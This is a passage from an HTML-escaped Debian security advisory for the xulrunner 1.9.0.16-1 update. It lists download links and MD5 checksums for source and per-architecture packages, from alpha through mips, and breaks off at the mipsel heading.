&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.16-1.dsc&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.16-1.dsc&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp; 1755 661a7213945541c3aff7c1225f4a4e4b
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.16.orig.tar.gz&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.16.orig.tar.gz&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: 44158276 49eccba737701abfd9f0405dc91fb848
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.16-1.diff.gz&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.16-1.diff.gz&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 116218 6d5380e0a12ea65cbfa98059641c5b1b
&lt;br&gt;&lt;br&gt;Architecture independent packages:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozillainterfaces-java_1.9.0.16-1_all.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozillainterfaces-java_1.9.0.16-1_all.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;1464570 40a5ae6f705fe11bb244e039804233ea
&lt;br&gt;&lt;br&gt;alpha architecture (DEC Alpha)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_alpha.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_alpha.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: 51094414 36f539011a5ee228fae0195020709cc7
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_alpha.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_alpha.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 432242 c5110bdb4836a6e20a9b9b8e6959c1e9
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_alpha.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_alpha.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;9494198 0139dd56d61b77e77316ab24937df305
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_alpha.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_alpha.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 938424 b52ef8d6a5671df01a179e42379af747
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_alpha.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_alpha.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;72044 2fe658f8d17e1547d7c18d7e382b1c02
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_alpha.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_alpha.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 163948 ee725d4c448ebf6d3c3def1ec0302e8a
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_alpha.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_alpha.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;3651674 4f728529795d19de42ee07c1a994d84e
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_alpha.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_alpha.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 221628 578247ecd3b3c21230b272fe446c85b8
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_alpha.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_alpha.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 112068 52292e961eea13ac499f0923f8f56afe
&lt;br&gt;&lt;br&gt;amd64 architecture (AMD x86_64 (AMD64))
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_amd64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_amd64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;3288346 c4994fb96c217a3d16d718b919c5488a
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_amd64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_amd64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 151976 db96efb00277b2eae199c26b99ea043e
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_amd64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_amd64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;69948 db7a93f30248ee123430c0ec8fc51388
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_amd64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_amd64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 101544 804243e7ed5e3fadb407f16d9d78f081
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_amd64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_amd64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 890384 5dfe153e3eafca3a3590d44692088152
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_amd64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_amd64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 374232 dfee7250cbe693362d58228d815b17a1
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_amd64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_amd64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: 50332174 0c1988f9cff6d4718d0965f6fe2ca00c
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_amd64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_amd64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;7724684 2ece5643c14ae34a0270d1bb740d0190
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_amd64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_amd64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 223014 368b9f81b97bedfd51ea46cef4bfed9c
&lt;br&gt;&lt;br&gt;hppa architecture (HP PA RISC)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_hppa.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_hppa.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 223372 f14b9641604130cbd1316684ce80eea4
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_hppa.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_hppa.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;72040 cee4430fd91f516a3a6b64a851cba9d1
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_hppa.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_hppa.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 898940 adc9f60d3478ac3efac390b54f758c08
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_hppa.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_hppa.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 413076 fa0451857abe00213b1c2fdbbeeb9216
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_hppa.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_hppa.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 158510 c33508922abba00e2db82b4330cfe556
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_hppa.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_hppa.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: 51227746 215c15bee82bd5ee69c1603c93e47c74
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_hppa.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_hppa.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;3629732 24ae38db87e085986b45cbfbf51596b5
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_hppa.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_hppa.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 106760 9d9f796627813bf63d3d59cbc80cae94
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_hppa.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_hppa.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;9512538 053e525101326d09b2b302090b172496
&lt;br&gt;&lt;br&gt;i386 architecture (Intel ia32)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;6603188 5a7d3778788b71f3214ed981d2158481
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 141452 0281b88b7c5efcd28e70283d9083a78c
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 350878 d2977664d676cf868f1945c7949ff91b
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;3565586 3a069b19bc73d53ace1bd816412b4672
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 851826 a7b7b5596d788b006125e1af9f50b9e2
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 223270 46166eab3e8d094223f19cf7024f00f5
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: 49496458 37d985ecce882e81a20e797ad1ea3618
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;68158 8b79e51fcd2e87aba9db39b000027e5f
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;79204 52f55479a92095e5e410680a64c35a69
&lt;br&gt;&lt;br&gt;ia64 architecture (Intel ia64)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_ia64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_ia64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 223178 56b4d13963a5417365ac98e7cb68f9c2
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_ia64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_ia64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 180234 118576ab26bd4bc6e98a32574d30aa21
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_ia64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_ia64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;76530 5d78eca360e0d75cb28ca38fed899d91
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_ia64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_ia64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 811202 72192683bea462cc1f5f672c7988d9e9
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_ia64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_ia64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 121554 ac350b3e945c3d6b619d07f099af37ce
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_ia64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_ia64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;3397796 8d200fb548f982d0752ade5d0c28f593
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_ia64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_ia64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: 49671280 16b4ad4e4ab3f9eab9ff83baf69e098f
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_ia64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_ia64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: 11302800 b071e5b863130a778ab494c853617ca6
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_ia64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_ia64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 542146 141726b2753b7921fed58c5ffba4c2df
&lt;br&gt;&lt;br&gt;mips architecture (MIPS (Big Endian))
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_mips.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_mips.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 918282 528a68827030f8761ab114e74fafc1e4
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_mips.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_mips.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;3308002 bf1f6036812f8848332a98197b46e8ac
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_mips.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_mips.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 223192 2c1f794ad7ff07396a5290c0fb39885d
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_mips.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_mips.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;97104 2bdf01e5ce9380788078e3da3dce886a
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_mips.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_mips.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;69950 5e7d343695b4b895020e7346daf6dad8
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_mips.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_mips.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: 51850028 8d341a8e7ef18c24778b61ae228dfcd7
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_mips.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_mips.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 380128 d1394d5bbc20bb7822aede419206733d
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_mips.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_mips.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 145388 263d12d202370293e8eb3b4c5374365d
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_mips.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_mips.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;7649668 6d6cf7e6a00da066b8e5fbdeba9d61ed
&lt;br&gt;&lt;br&gt;mipsel architecture (MIPS (Little Endian))
